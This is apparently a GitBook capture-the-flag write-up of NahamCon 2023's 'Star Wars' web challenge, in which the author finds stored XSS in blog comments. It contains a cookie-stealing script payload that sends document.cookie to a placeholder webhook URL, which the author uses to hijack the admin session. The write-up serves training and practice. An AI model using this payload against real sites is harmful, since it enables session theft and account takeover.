ctf-writeups-page
  • 🚩teebow1e's CTF write-ups
  • Challenges I created
    • Page 1
  • 2023
    • NahamCon CTF
      • Museum
      • Obligatory
      • Star Wars
      • Hidden Figures
    • DownUnderCTF 2023
      • misc challenges
Powered by GitBook
On this page
  • Description
  • Solution
  1. 2023
  2. NahamCon CTF

Star Wars

Typical XSS challenge.

PreviousObligatoryNextHidden Figures

Last updated 1 year ago

Description

Author: @congon4tor#2334

If you love Star Wars as much as I do you need to check out this blog!

Solution

On visiting the site, we was welcomed with a login and signup prompt. Trying some SQLi and SSTI doesn't work.

We have a site with post (and comment also!).

Given the use of numbering for each post, I also tried some IDOR tricks but it turned out that there is no hidden posts.

When comment, I received this notification:

<script>document.location="WEBHOOKS_URL/?q="+document.cookie</script>

And we got the admin's cookie:

Using this cookie to login, we are admin now and we can get the flag in the /admin endpoint.

Great! Someone is reading my comment, which is a perfect sign of XSS. Let's fire up and my favourite XSS payload:

webhooks